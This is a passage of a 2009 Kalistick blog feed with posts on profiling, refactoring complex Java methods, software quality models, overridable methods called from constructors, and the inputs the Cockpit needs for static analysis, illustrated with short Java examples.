&lt;/li&gt;&lt;/ul&gt;    &lt;h2&gt;How to prevent performance problems&lt;/h2&gt; &lt;p&gt;Now that we've discussed some easily identifiable problems, the question is how to avoid them as early as possible. The first answer is to use trained and experienced developers! 
Every developer has the right to youthful indiscretions, but one would hope that they would only commit them once. :-) Training is key in our approach. The developer can find errors, document them in the best practices, and avoid reproducing the same errors in the future. &lt;/p&gt;  &lt;p&gt; The second solution is to use a specialized tool to analyze performance: a &lt;em&gt;profiling&lt;/em&gt; tool. Such tools are designed to trace the execution of an application in order to provide a detailed view of its performance, whether in real time or afterwards, including CPU usage, memory used, threads, garbage collector activity, etc. A &lt;em&gt;drill-down&lt;/em&gt; mechanism is generally provided for targeting the faulty code. Learning how to use these tools is not always simple, but the real challenge is running the application with test scenarios that are exhaustive enough to cover all of the code to be tested. &lt;/p&gt;  &lt;p&gt; References: &lt;a href="http://www.ej-technologies.com/products/jprofiler/overview.html"&gt;JProfiler&lt;/a&gt; (Java), &lt;a href="http://www.yourkit.com/"&gt;YourKit&lt;/a&gt; (Java and C#), and &lt;a href="http://www.jetbrains.com/profiler/"&gt;dotTrace&lt;/a&gt; (C#). Since version 6, Java also ships with its own integrated profiling tool: &lt;a href="http://java.sun.com/javase/6/docs/technotes/guides/visualvm/index.html"&gt;VisualVM&lt;/a&gt;. &lt;/p&gt;  &lt;h2&gt;Conclusion&lt;/h2&gt; &lt;p&gt;Statistical analysis is less productive and exact than a profiling session because it doesn't know the context of execution, but it can be used to quickly and easily identify obvious defects, particularly &lt;strong&gt;upstream of the problems&lt;/strong&gt;. And this is a key point of our approach: the earlier you correct problems, the less expensive it will be! 
&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-8826280044863824790?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/8826280044863824790/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/07/statistical-analysis-of-code-to-improve.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/8826280044863824790?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/8826280044863824790?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/bzzABpRJy7Y/statistical-analysis-of-code-to-improve.html" title="Statistical analysis of code to improve its performance" /><author><name>Sylvain FRANCOIS</name><uri>http://www.blogger.com/profile/06251148498666563285</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="02346869876555156895" /></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/07/statistical-analysis-of-code-to-improve.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUYFRno7fSp7ImA9WxNXF0k.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-8087031267496841690</id><published>2009-05-19T11:46:00.001+02:00</published><updated>2009-10-05T14:51:57.405+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-10-05T14:51:57.405+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="java" /><category scheme="http://www.blogger.com/atom/ns#" term="practice" /><category scheme="http://www.blogger.com/atom/ns#" term="c#" /><title>Simplify your code</title><content type="html">&lt;p&gt; By 
examining the results of analyses on our customers' projects on our &lt;a href="http://www.kalistick.com/index.php/english/Cockpit/"&gt;Cockpit SaaS platform&lt;/a&gt;, it is clear that a &lt;em&gt;"Quick Win"&lt;/em&gt; strategy is often used for corrections. The team prioritizes glaring bugs (like floating point comparisons and synchronization problems) and anomalies that are quick to correct (dead code, redundant casting, missing documentation headers, etc.). &lt;/p&gt;  &lt;p&gt;Among the anomalies that remain week after week, we generally find overly complex methods. This type of problem is often considered to be complicated and risky to resolve for a rather hypothetical benefit. By checking their dashboards on the Cockpit, development teams become aware of the problem and therefore improve new developments, but pre-existing methods are rarely corrected. Let's consider the return on investment for this type of correction: the cost may be small, the risks can be controlled, and the benefits may be high. &lt;/p&gt;  &lt;h2&gt;Complex?&lt;/h2&gt; &lt;p&gt;By complex, we are referring to a method that is rather long or complicated in its algorithms. Theoretically, complexity is reflected in a &lt;strong&gt;high number of instructions&lt;/strong&gt; (typically &gt; 100, which equates to about 200-250 lines) or significant &lt;a href="http://en.wikipedia.org/wiki/Cyclomatic_complexity"&gt;cyclomatic complexity&lt;/a&gt; (typically &gt; 20). Based on our statistics, about 4% of methods are highly complex in the projects we analyze for the first time, but this low percentage often represents &lt;strong&gt;10% to 20% of the application's total code&lt;/strong&gt; (depending on the project type and language)! 
Here is a typical example of how methods are distributed according to their cyclomatic complexity in a Java project: &lt;/p&gt; &lt;img style="margin: 0px auto 10px; display: block; text-align: center;" src="http://www.kalistick.fr/blog/res/2009/05/Chart-Complexite.png" alt="Chart of methods by complexity" width="469" height="355" /&gt;  &lt;p&gt; Another dimension that can add to the complexity of methods is the &lt;strong&gt;number of distinct dependencies&lt;/strong&gt; on external types/classes (the &lt;em&gt;efferent coupling&lt;/em&gt; concept). One method using many types in its processing is generally more difficult to understand and test. We will soon offer a new quality rule that includes this dimension in the Cockpit rules repository (this rule is currently being configured to set the different thresholds). &lt;/p&gt;  &lt;h2&gt;Why simplify these methods&lt;/h2&gt; &lt;p&gt;There are true challenges associated with simplifying a complex method. The objective is not just to come below the theoretical thresholds set by some quality manager or tool. &lt;/p&gt; &lt;ul&gt;&lt;li&gt;&lt;strong&gt;Maintenance&lt;/strong&gt;: This is the most obvious reason. By definition, a complex method is &lt;strong&gt;difficult to understand and update&lt;/strong&gt;.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Testability&lt;/strong&gt;: A complex method generally cannot be properly unit tested. A unit test should check one process... a unit. Testing a method that combines several processes is like tasting several wines mixed in a single glass; it is difficult to draw reliable conclusions. This touches upon &lt;strong&gt;responsibility&lt;/strong&gt;, which is particularly important in object-oriented development.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Reusability&lt;/strong&gt;: It is more difficult to reuse a method that strings together different processes with varying specificity than to reuse unitary methods. 
Here again, this is a matter of &lt;em&gt;responsibility&lt;/em&gt;.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Extensibility&lt;/strong&gt;: With inheritance, it is preferable to override unitary methods rather than to redefine a complex method altogether, which avoids having to copy code.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Automatic documentation&lt;/strong&gt;: Modern languages generally have a standard documentation format for the header comments of methods, and these comments can be used to automatically generate technical documentation. Breaking apart a method lets you transform informal internal comments into standard documentation, creating added value. In addition, the simple fact of &lt;strong&gt;naming&lt;/strong&gt; the new unitary methods helps to automatically document the code.&lt;/li&gt;&lt;/ul&gt;    &lt;h2&gt;Are there risks in simplifying a method?&lt;/h2&gt; &lt;p&gt; Common sense suggests that changing a complex method carries a &lt;strong&gt;regression risk&lt;/strong&gt;. This is both because the process is difficult to understand and because it touches so many areas that could regress. &lt;/p&gt;  &lt;p&gt; In many cases, however, &lt;strong&gt;using the right tools&lt;/strong&gt; can help to reduce the risk or even remove it entirely. This is the principle of &lt;a href="http://fr.wikipedia.org/wiki/Refactorisation"&gt;refactoring&lt;/a&gt;: the program's structure is modified without impacting its behavior. &lt;/p&gt;  &lt;h2&gt;How do you simplify a complex method?&lt;/h2&gt; &lt;p&gt; There are two possible ways: manual refactoring and automatic refactoring. &lt;/p&gt;  &lt;h3&gt;Manual refactoring&lt;/h3&gt; &lt;p&gt; Let's consider the following method: &lt;/p&gt;  &lt;pre name="code" class="java:nocontrols"&gt;  public void addToProject(String input) throws InputException
{
 // Apply regexp to input string
 Matcher matcher = PATTERN.matcher(input);
 if (!matcher.matches())
   throw new InputException("Input does not match:" + input);

 // Retrieve user
 String idUser = matcher.group(1);
 User user = userService.findUser(idUser);
 if (user == null)
   throw new InputException("No user for ID:" + idUser);
 if (!user.isActive())
   return;
 String password = matcher.group(2);
 if (!user.getPassword().equals(password))
   throw new InputException("Invalid password for user:" + idUser);

 // Retrieve project
 String idProject = matcher.group(3);
 Project project = projectService.findProject(idProject);
 if (project == null)
   throw new InputException("No project for ID:" + idProject);
 if (project.hasUser(user))
   return;

 // Add user to project
 project.addUser(user);
 projectService.saveProject(project);
}
&lt;/pre&gt;  &lt;p&gt; The purpose of this method is to add a user to a project after first checking the supplied information; the parameters are encoded in a string. Four successive processes can easily be identified in this method: decoding the input string, identifying the user, identifying the project, and associating the user with the project. Altogether, it might not seem complex, but imagine having to manage even more parameters or input controls. &lt;/p&gt;  &lt;p&gt;A good response would be to simplify this method by separating the user and project lookups into two distinct methods. This type of refactoring is generally referred to in the IDE as &lt;em&gt;Extract/Introduce method&lt;/em&gt;. But in this case, there are two recurring problems for this type of refactoring:  &lt;/p&gt;&lt;ol&gt;&lt;li&gt;     There are multiple &lt;strong&gt;output points&lt;/strong&gt; with different types: Boolean, &lt;em&gt;User&lt;/em&gt; or &lt;em&gt;Project&lt;/em&gt; objects, or &lt;em&gt;void&lt;/em&gt;.       &lt;/li&gt;&lt;li&gt;     &lt;strong&gt;Multiple variables are updated&lt;/strong&gt; in the externalized processes.    &lt;/li&gt;&lt;/ol&gt;  &lt;p&gt; The first problem arises because a Java or C# method can only return &lt;strong&gt;one type&lt;/strong&gt;. The second problem can sometimes be resolved by passing variables in as parameters, but this only works if the variables can truly be passed by reference, which is not possible with scalar types or strings, for example. &lt;/p&gt;  &lt;p&gt; At least two solutions can resolve this gracefully. Both require introducing an object that encapsulates the different variables that might be updated. They are based on well-known refactorings, as popularized by &lt;a href="http://www.amazon.fr/Refactoring-Improving-Design-Existing-Code/dp/toc/0201485672"&gt;Martin Fowler&lt;/a&gt;. 
&lt;/p&gt;  &lt;h4&gt;Introduce Parameter Object + Extract Method&lt;/h4&gt; &lt;p&gt; This solution involves &lt;strong&gt;regrouping the variables&lt;/strong&gt; used for input and output into a new object and then passing the object from method to method. The new object generally contains only attributes. In C#, this is typically implemented with a private class, and in Java, a private static class is used (preferably with comments ;-) ): &lt;/p&gt;  &lt;pre name="code" class="java:nocontrols"&gt;  private final static class InputContext
{
 private Matcher matcher;
 private User user;
 private Project project;

 private InputContext(Matcher matcher)
 {
   this.matcher = matcher;
 }

 public Matcher getMatcher()
 {
   return matcher;
 }

 public void setMatcher(Matcher matcher)
 {
   this.matcher = matcher;
 }

 public User getUser()
 {
   return user;
 }

 public void setUser(User user)
 {
   this.user = user;
 }

 public Project getProject()
 {
   return project;
 }

 public void setProject(Project project)
 {
   this.project = project;
 }
}
&lt;/pre&gt;  &lt;p&gt; Traditional refactoring, &lt;em&gt;Extract Method&lt;/em&gt;, can also be used as normal: &lt;/p&gt;  &lt;pre name="code" class="java:nocontrols"&gt;  public void addToProject(String input) throws InputException
{
 // Apply regexp to input string
 Matcher matcher = PATTERN.matcher(input);
 if (!matcher.matches())
   throw new InputException("Input does not match:" + input);

 InputContext inputContext = new InputContext(matcher);

 // Fill context with user &amp;amp; project
 if (!retrieveUser(inputContext))
   return;
 if (!retrieveProject(inputContext))
   return;

 // Add user to project
 Project project = inputContext.getProject();
 project.addUser(inputContext.getUser());
 projectService.saveProject(project);
}

protected boolean retrieveUser(InputContext inputContext) throws InputException
{
 String idUser = inputContext.getMatcher().group(1);
 User user = userService.findUser(idUser);
 if (user == null)
   throw new InputException("No user for ID:" + idUser);
 if (!user.isActive())
   return false;
 String password = inputContext.getMatcher().group(2);
 if (!user.getPassword().equals(password))
   throw new InputException("Invalid password for user:" + idUser);

 inputContext.setUser(user);

 return true;
}

protected boolean retrieveProject(InputContext inputContext) throws InputException
{
 String idProject = inputContext.getMatcher().group(3);
 Project project = projectService.findProject(idProject);
 if (project == null)
   throw new InputException("No project for ID:" + idProject);
 if (project.hasUser(inputContext.getUser()))
   return false;

 inputContext.setProject(project);

 return true;
}
&lt;/pre&gt;  &lt;p&gt; In addition to simplifying maintenance, we see that the externalized processing can be &lt;strong&gt;easily overridden through inheritance&lt;/strong&gt;. &lt;/p&gt;  &lt;h4&gt;Replace Method with Method Object&lt;/h4&gt; &lt;p&gt; This refactoring builds upon the concept of encapsulation by moving the externalized methods &lt;strong&gt;into the new object's class&lt;/strong&gt;. The object paradigm calls for data and associated processing to be grouped into coherent, autonomous entities. Both solutions are relevant. You can decide whether you prefer to separate or group together data and processing. The same choice can be found in the debate over &lt;a href="http://en.wikipedia.org/wiki/Active_record_pattern"&gt;Active Record&lt;/a&gt; versus &lt;a href="http://en.wikipedia.org/wiki/Data_access_object"&gt;DAO&lt;/a&gt;. &lt;/p&gt;  &lt;h3&gt;Automatic refactoring&lt;/h3&gt; &lt;p&gt; There are obviously regression risks involved with manual refactoring. Fortunately, IDEs are quite advanced in this area. Traditional refactorings, such as renaming, moving, and introducing variables, have existed for a long time. More recently, more advanced refactorings have become available. &lt;a href="http://www.jetbrains.com/idea/"&gt;IntelliJ IDEA&lt;/a&gt; offers the &lt;em&gt;Replace Method with Method Object&lt;/em&gt; refactoring (under the name &lt;a href="http://www.jetbrains.com/idea/features/refactoring.html#Extract_Method_Object"&gt;Extract Method Object&lt;/a&gt;). &lt;/p&gt; &lt;p&gt; Simply select the block of instructions to externalize and run an &lt;em&gt;Extract Method&lt;/em&gt;. 
If IntelliJ IDEA detects that this refactoring is not possible, it offers the &lt;em&gt;Replace Method with Method Object&lt;/em&gt; refactoring instead: &lt;/p&gt; &lt;img style="margin: 0px auto 10px; display: block; text-align: center;" src="http://www.kalistick.fr/blog/res/2009/05/Idea-ExtractMethod.png" alt="'Extract Method' function with IntellijIDEA" border="0" width="512" height="512" /&gt;  &lt;p&gt; This refactoring can be configured via the GUI: &lt;/p&gt; &lt;img style="margin: 0px auto 10px; display: block; text-align: center;" src="http://www.kalistick.fr/blog/res/2009/05/Idea-ExtractMethodObject.png" alt="'Extract Method Object' function with IntellijIDEA" border="0" width="441" height="493" /&gt;  &lt;p&gt; IntelliJ IDEA is currently the only IDE to support this type of refactoring. The others only have &lt;em&gt;Extract Method&lt;/em&gt; (Eclipse or NetBeans for Java; Visual Studio with the &lt;a href="http://www.jetbrains.com/resharper"&gt;ReSharper&lt;/a&gt; or &lt;a href="http://www.devexpress.com/Products/Visual_Studio_Add-in/Refactoring/"&gt;Refactor! Pro&lt;/a&gt; plugins for C#). &lt;/p&gt;  &lt;p&gt; The advantages of automatic refactoring are obviously its speed and its much lower regression risk (thus the importance of choosing the right development tools for optimizing productivity). Here, the developer's only job is to &lt;strong&gt;identify&lt;/strong&gt; blocks of instructions to externalize and then to &lt;strong&gt;name&lt;/strong&gt; them. We can then review the most complex methods in a project and simplify them one by one (if possible, documenting them and associating unit tests with them). &lt;/p&gt;  &lt;h2&gt;Conclusion&lt;/h2&gt; &lt;p&gt; As always, it is best to avoid problems &lt;strong&gt;upstream&lt;/strong&gt; rather than having to correct them later. Developers should be careful to write only unitary methods. Knowing how to split up a method comes with experience, and extracting methods then becomes natural. 
But don't overlook the increased productivity that is available with modern IDEs, particularly in their &lt;strong&gt;refactoring&lt;/strong&gt; functions. &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-8087031267496841690?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/8087031267496841690/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/05/simplify-your-code.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/8087031267496841690?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/8087031267496841690?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/D62-Jl9vlww/simplify-your-code.html" title="Simplify your code" /><author><name>Sylvain FRANCOIS</name><uri>http://www.blogger.com/profile/06251148498666563285</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="02346869876555156895" /></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/05/simplify-your-code.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEMBR3szcSp7ImA9WxNSGEw.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-1749536864999638135</id><published>2009-03-23T10:45:00.000+01:00</published><updated>2009-09-01T16:47:36.589+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-09-01T16:47:36.589+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="theory" /><title>What is quality software?</title><content type="html">&lt;p&gt;&lt;strong&gt;What is quality software?&lt;/strong&gt; The answer will 
largely depend on the role of the person you ask. A user will focus on their needs, while someone in charge of maintenance will prefer code that is reliable, readable, and understandable. Some will be happy with a quantitative definition (e.g., the number of bugs per 1000 instructions), while others prefer a more qualitative definition (how well it satisfies user needs, the success of the product, etc.). &lt;/p&gt; &lt;p&gt;For more than 30 years, countless researchers have worked to find models that effectively and objectively quantify software quality.&lt;/p&gt;  &lt;p&gt;Several models have been noteworthy, including the following:&lt;/p&gt;  &lt;p&gt;&lt;strong&gt;The McCall Model (1977):&lt;/strong&gt; McCall's "Quality Triangle" (1) is one of the first published models for quality. Three high-level "perspectives" group together eleven quality factors that can be measured based on a set of properties. One of the criticisms of this model is the subjectivity of some properties.&lt;/p&gt;  &lt;div style="text-align: center;"&gt; &lt;img src="http://www.kalistick.fr/blog/res/2009/02/mccall.png" alt="" /&gt; &lt;/div&gt; &lt;p&gt;&lt;strong&gt;The Boehm Model (1978):&lt;/strong&gt; Boehm and his team were inspired by the McCall model (a three-level hierarchical model), and they expanded the list of measurable quality factors.&lt;/p&gt;  &lt;a href="http://en.wikipedia.org/wiki/Barry_Boehm"&gt;http://en.wikipedia.org/wiki/Barry_Boehm&lt;/a&gt;
&lt;a href="http://sunset.usc.edu/Research_Group/barry.html"&gt;http://sunset.usc.edu/Research_Group/barry.html&lt;/a&gt;  &lt;p&gt;&lt;strong&gt;ISO 9126 (1991):&lt;/strong&gt; The International Organization for Standardization's ISO 9126 was inspired by these models to define a standard quality model and establish recommendations for measuring its characteristics. &lt;/p&gt; &lt;p&gt; &lt;a href="http://en.wikipedia.org/wiki/ISO_9126"&gt;http://en.wikipedia.org/wiki/ISO_9126&lt;/a&gt;
&lt;/p&gt;  &lt;p&gt;However, despite the degree of theoretical maturity, it was difficult to put these models into practice. Software providers are fully aware of the impact of implementing code quality control on the reliability and maintainability of software. However, code quality remains an untapped source of improvements, as opposed to process quality or project management (CMMI, ISO certifications).&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;p&gt; A study (2) conducted on nearly 200 software providers highlighted the reasons that discouraged them from establishing development quality procedures. The main reasons mentioned are:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;Setup and monitoring time&lt;/li&gt;&lt;li&gt;The initial cost&lt;/li&gt;&lt;li&gt;Lack of support from quality management&lt;/li&gt;&lt;/ul&gt; &lt;p&gt; The research and development we have conducted with the INSA Lyon and CETIC laboratories is based on the above research, yet it provides specific responses to these problems. Some of the findings from this research are available in a &lt;a href="http://liesp.insa-lyon.fr/v2/?q=fr/node/100406"&gt;scientific publication&lt;/a&gt;, published by ICSSEA (International Conference on Software &amp;amp; Systems Engineering and their Applications) in 2008.&lt;/p&gt;   &lt;p&gt; &lt;em&gt;(1) McCall, J. A., Richards, P. K., and Walters, G. F., "Factors in Software Quality", Nat'l Tech. Information Service, no. Vol. 1, 2 and 3, 1977&lt;/em&gt; &lt;/p&gt; &lt;p&gt; &lt;em&gt;(2) J.M. Verner, T.T. Moores, A.R. 
Barret “Software quality: perceptions and practices in Hong Kong”, Achieving quality in software, Chapman &amp;amp; Hall, 1996, p.77-88&lt;/em&gt; &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-1749536864999638135?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/1749536864999638135/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/08/what-is-quality-software.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/1749536864999638135?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/1749536864999638135?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/P-TFxTQZ-lk/what-is-quality-software.html" title="What is quality software?" 
/><author><name>Charles Bompay</name><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/08/what-is-quality-software.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEMGRng_fip7ImA9WxNSGEw.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-4251701568136863991</id><published>2009-03-09T10:44:00.000+01:00</published><updated>2009-09-01T16:47:07.646+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-09-01T16:47:07.646+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="java" /><category scheme="http://www.blogger.com/atom/ns#" term="practice" /><category scheme="http://www.blogger.com/atom/ns#" term="c#" /><title>[Practice] Derivable internal method called in the constructor</title><content type="html">&lt;p&gt; &lt;em&gt;Each article in the &lt;a href="http://blog.kalistick.com/search/label/practice"&gt;Practice&lt;/a&gt; category focuses on a bad development practice detected by Kalistick's Cockpit.&lt;/em&gt; &lt;/p&gt;  &lt;p&gt;Calling a derivable internal method (not &lt;span style="font-weight: bold;font-family:courier new;" &gt;final&lt;/span&gt;&lt;span style="font-weight: bold;"&gt; &lt;/span&gt;in Java, or &lt;span style="font-weight: bold;font-family:courier new;" &gt;virtual&lt;/span&gt;&lt;span style="font-family:courier new;"&gt; &lt;/span&gt;in C#) from the class constructor is a risky practice. If the method is overloaded, inconsistencies or even errors may arise.&lt;/p&gt;&lt;p&gt; &lt;/p&gt;The intrinsic reasons for these errors are closely related to the object instantiation processes in the C# and Java languages, particularly when executing parent constructors before initializing the fields in the child class. &lt;p&gt;Example:&lt;/p&gt;&lt;span style="font-weight: bold;font-family:courier new;" &gt;MyWindow.java&lt;/span&gt; &lt;pre name="code" class="java:nocontrols"&gt;public class MyWindow
{
public MyWindow()
{
 /* ... */
 buildUI();
}

public void buildUI()
{
 /* ... */
}
}
&lt;/pre&gt;   &lt;span style="font-weight: bold;font-family:courier new;" &gt;MyExtendedWindow.java&lt;/span&gt; &lt;pre name="code" class="java:nocontrols"&gt;public class MyExtendedWindow extends MyWindow
{
private MyComponent component;

public MyExtendedWindow()
{
 this.component = new MyComponent();
}

public void buildUI()
{
 super.buildUI();
 component.setWidth(800);
}
}
&lt;/pre&gt;   &lt;p&gt; &lt;img src="http://www.kalistick.fr/blog/images/pin.png" alt="" /&gt; The &lt;code&gt;buildUI&lt;/code&gt; method in the &lt;code&gt;MyWindow&lt;/code&gt; class is derivable and called in the constructor for the &lt;code&gt;MyWindow&lt;/code&gt; class. &lt;/p&gt;   &lt;p&gt; &lt;img src="http://www.kalistick.fr/blog/images/pin.png" alt="" /&gt; The &lt;code&gt;MyExtendedWindow&lt;/code&gt; class extends &lt;code&gt;MyWindow&lt;/code&gt; and overrides the &lt;code&gt;buildUI&lt;/code&gt; method in order to add processing on its own fields. &lt;/p&gt;    &lt;p&gt;When instantiating an object of the &lt;code&gt;MyExtendedWindow&lt;/code&gt; class, the order of execution will be as follows:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;Initialize the fields in the &lt;code&gt;MyWindow&lt;/code&gt; class (declaration).&lt;/li&gt;&lt;li&gt;Execute the constructor for the &lt;code&gt;MyWindow&lt;/code&gt; class.&lt;/li&gt;&lt;li&gt;Execute the &lt;code&gt;buildUI&lt;/code&gt; method in the &lt;code&gt;MyExtendedWindow&lt;/code&gt; class (override).&lt;/li&gt;&lt;li&gt;Initialize the fields in the &lt;code&gt;MyExtendedWindow&lt;/code&gt; class (declaration).&lt;/li&gt;&lt;li&gt;Execute the constructor for the &lt;code&gt;MyExtendedWindow&lt;/code&gt; class. &lt;/li&gt;&lt;/ol&gt; &lt;p&gt;The instantiation will fail with a null reference error (a &lt;code&gt;NullPointerException&lt;/code&gt; in Java) in step 3, since the &lt;code&gt;setWidth&lt;/code&gt; method in &lt;code&gt;MyComponent&lt;/code&gt; is called before the &lt;code&gt;component&lt;/code&gt; object is initialized, which only happens in step 5. Here, the error is obvious. 
In other circumstances, the symptoms might not be as obvious, making the diagnosis much more time-consuming!&lt;/p&gt;   &lt;p&gt; Possible corrections: &lt;/p&gt;&lt;ul&gt;&lt;li&gt;Declare the &lt;code&gt;buildUI&lt;/code&gt; method as non-derivable or private at the &lt;code&gt;MyWindow&lt;/code&gt; level so that it can no longer be overridden.&lt;/li&gt;&lt;li&gt;Remove the call to &lt;code&gt;buildUI&lt;/code&gt; from the &lt;code&gt;MyWindow&lt;/code&gt; constructor and explicitly call it after construction.&lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-4251701568136863991?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/4251701568136863991/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/08/practice-derivable-internal-method.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/4251701568136863991?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/4251701568136863991?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/KevEeoGBA60/practice-derivable-internal-method.html" title="[Practice] Derivable internal method called in the constructor" /><author><name>Charles Bompay</name><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/08/practice-derivable-internal-method.html</feedburner:origLink></entry><entry 
gd:etag="W/&quot;DEQNSH0zcSp7ImA9WxNSGEw.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-1435124277000540905</id><published>2009-02-26T11:03:00.000+01:00</published><updated>2009-09-01T16:46:39.389+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-09-01T16:46:39.389+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="cockpit" /><category scheme="http://www.blogger.com/atom/ns#" term="analysis" /><title>What elements need to be provided for an analysis?</title><content type="html">&lt;p&gt; The Cockpit analyzes projects based on &lt;a href="http://en.wikipedia.org/wiki/Static_code_analysis"&gt;static analysis&lt;/a&gt; techniques. To do this, a number of elements must be provided at the start of a new analysis. &lt;/p&gt; &lt;p&gt; There are three categories of elements: &lt;/p&gt; &lt;ul&gt;&lt;li&gt;Source files (*.cs and *.java)&lt;/li&gt;&lt;li&gt;Files generated from compiling (*.dll and *.jar)  &lt;/li&gt;&lt;li&gt;Libraries referenced by the project (*.dll and *.jar) &lt;/li&gt;&lt;/ul&gt; &lt;p&gt; The &lt;span class="ks_strong"&gt;source files&lt;/span&gt; are used in the analysis to calculate some metrics (such as the number of lines of code) and to search for practice anomalies and duplicates. These files are also used to generate the viewable source code you can access from an anomaly in the Cockpit. &lt;/p&gt; &lt;p&gt; The &lt;span class="ks_strong"&gt;files generated&lt;/span&gt; from compiling are used to extract structural elements from the code (classes, interfaces, methods, etc.), which are used to aggregate the quality measurements. Other metrics (number of instructions, &lt;a href="http://en.wikipedia.org/wiki/Cyclomatic_complexity"&gt;cyclomatic complexity&lt;/a&gt;, etc.) and practice anomalies are also extracted from these files. 
&lt;/p&gt; &lt;p&gt; Finally, the &lt;strong&gt;libraries&lt;/strong&gt; are not directly analyzed, but they are useful when searching for practice anomalies. &lt;/p&gt; &lt;p&gt; Let's consider the example of &lt;i&gt;NeverMakeCtorCallOverridableMethod&lt;/i&gt;, which checks for calls to a virtual method in the constructor. For each method called in a constructor, this rule checks whether it is virtual. If the method is defined in a library, its declaration must be accessible. &lt;/p&gt;
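&lt;p&gt; To make the "is it virtual?" test concrete, here is a minimal sketch for Java. It is only an illustration: it uses reflection, whereas the Cockpit works on the compiled files, and the class and method names (&lt;code&gt;OverridableCheck&lt;/code&gt;, &lt;code&gt;SampleWindow&lt;/code&gt;, &lt;code&gt;isOverridable&lt;/code&gt;) are hypothetical. It also shows why the declaring class must be loadable: without the library that declares the method, its modifiers cannot be read. &lt;/p&gt;

```java
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;

public class OverridableCheck {

    // Hypothetical sample class: buildUI can be overridden, initDefaults cannot.
    public static class SampleWindow {
        public void buildUI() { }
        public final void initDefaults() { }
    }

    // A Java method can be overridden unless it is private, static or final,
    // or unless its declaring class is final.
    public static boolean isOverridable(Method method) {
        int methodFlags = method.getModifiers();
        int classFlags = method.getDeclaringClass().getModifiers();
        boolean locked = Modifier.isPrivate(methodFlags)
                || Modifier.isStatic(methodFlags)
                || Modifier.isFinal(methodFlags)
                || Modifier.isFinal(classFlags);
        return !locked;
    }

    public static void main(String[] args) throws NoSuchMethodException {
        Method buildUI = SampleWindow.class.getDeclaredMethod("buildUI");
        Method initDefaults = SampleWindow.class.getDeclaredMethod("initDefaults");
        System.out.println("buildUI overridable: " + isOverridable(buildUI));
        System.out.println("initDefaults overridable: " + isOverridable(initDefaults));
    }
}
```

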